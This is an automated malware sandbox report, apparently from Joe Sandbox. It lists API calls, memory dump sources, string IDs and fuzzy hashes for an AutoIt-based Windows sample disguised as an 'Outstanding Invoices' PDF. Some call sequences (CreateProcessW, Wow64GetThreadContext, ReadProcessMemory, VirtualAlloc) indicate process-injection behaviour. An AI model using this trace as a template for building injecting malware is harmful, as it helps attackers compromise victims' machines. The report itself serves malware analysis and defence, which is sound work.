                                                                              • Figure not preserved: control-flow graph, first block 2e54650-2e546fe; named calls in the graph: CreateFileW, VirtualAlloc, ReadFile, CloseHandle, VirtualFree.
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 02E54721
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02E54947
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2042513613.0000000002E52000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E52000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2e52000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileFreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 204039940-0
                                                                              • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                              • Instruction ID: a080b1e4f449957bb01023bd71f5360f582adb871085a4df3f9c10fefd159366
                                                                              • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                              • Instruction Fuzzy Hash: 18A12774E50259EBDB14CFA4C895BEEB7B5BF48308F209159E901BB2C0D7799A80CF50

                                                                              Control-flow Graph

                                                                              • Figure not preserved: control-flow graph, first block 414f10-414f2c.
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                              • String ID:
                                                                              • API String ID: 3886058894-0
                                                                              • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                              • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                              • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                              • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • _memset.LIBCMT ref: 00401C62
                                                                              • _wcsncpy.LIBCMT ref: 00401CA1
                                                                              • _wcscpy.LIBCMT ref: 00401CBD
                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                              • String ID: Line:
                                                                              • API String ID: 1620655955-1585850449

                                                                              Control-flow Graph

                                                                              control_flow_graph 627 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                              APIs
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                              • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                              • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateShow
                                                                              • String ID: AutoIt v3$edit
                                                                              • API String ID: 1584632944-3779509399
                                                                              APIs
                                                                                • Part of subcall function 02E542F0: Sleep.KERNELBASE(000001F4), ref: 02E54301
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02E54546
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2042513613.0000000002E52000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E52000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2e52000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFileSleep
                                                                              • String ID: QAASN3QT63BI73DI6LOOZRV
                                                                              • API String ID: 2694422964-267715321
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 00413AA6
                                                                                • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                              • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                              • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                              • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                              • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                              • String ID:
                                                                              • API String ID: 2714421763-0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _malloc
                                                                              • String ID: Default$|k
                                                                              • API String ID: 1579825452-2254895183
                                                                              APIs
                                                                                • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                              • _strcat.LIBCMT ref: 0040F603
                                                                                • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                                • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                              • String ID: HH
                                                                              • API String ID: 1194219731-2761332787
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 02E53AAB
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02E53B41
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02E53B63
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2042513613.0000000002E52000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E52000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2e52000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              APIs
                                                                              • __flush.LIBCMT ref: 00414630
                                                                              • __fileno.LIBCMT ref: 00414650
                                                                              • __locking.LIBCMT ref: 00414657
                                                                              • __flsbuf.LIBCMT ref: 00414682
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                              • String ID:
                                                                              • API String ID: 3240763771-0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0040E202
                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell__memset
                                                                              • String ID:
                                                                              • API String ID: 928536360-0
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 1411284514-0
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00434FB8
                                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00434FD2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Temp$FileNamePath
                                                                              • String ID: aut
                                                                              • API String ID: 3285503233-3010740371
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,00452BC1,?,?,?), ref: 00434F7E
                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 00434F98
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00434F9F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleTime
                                                                              • String ID:
                                                                              • API String ID: 3397143404-0
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00401B71
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: @EXITCODE
                                                                              • API String ID: 580348202-3436989551
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __lock_file_memset
                                                                              • String ID:
                                                                              • API String ID: 26237723-0
                                                                              APIs
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              • __lock_file.LIBCMT ref: 00414EE4
                                                                                • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                              • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              • API String ID: 717694121-0
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 02E53AAB
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02E53B41
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02E53B63
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2042513613.0000000002E52000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E52000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2e52000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              APIs
                                                                              • __lock_file.LIBCMT ref: 00414715
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __decode_pointer__getptd_noexit__lock_file
                                                                              • String ID:
                                                                              • API String ID: 3158947991-0
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ProcWindow
                                                                              • String ID:
                                                                              • API String ID: 181713994-0
                                                                              • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                              • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                              • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                              • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                              APIs
                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHeap
                                                                              • String ID:
                                                                              • API String ID: 10892065-0
                                                                              • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                              • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                              • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                              • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ProcWindow
                                                                              • String ID:
                                                                              • API String ID: 181713994-0
                                                                              • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                              • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                              • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                              • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __wfsopen
                                                                              • String ID:
                                                                              • API String ID: 197181222-0
                                                                              • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                              • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                              • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                              • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000001F4), ref: 02E54301
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2042513613.0000000002E52000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E52000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2e52000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction ID: bfc2aaa3b8df8e55acfd1f7f2258008ad3b7dd463eba0a66fc96f126af8ea115
                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction Fuzzy Hash: 1CE0E67498010DDFDB00EFF4D54969E7FB4EF04301F104161FD01D2291D6309D508A62
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                              • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                              • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                              • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                              • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                              • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                              • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                              • SendMessageW.USER32 ref: 0047C2FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$State$LongProcWindow
                                                                              • String ID: @GUI_DRAGID$F
                                                                              • API String ID: 1562745308-4164748364
                                                                              • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                              • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                              • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                              • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
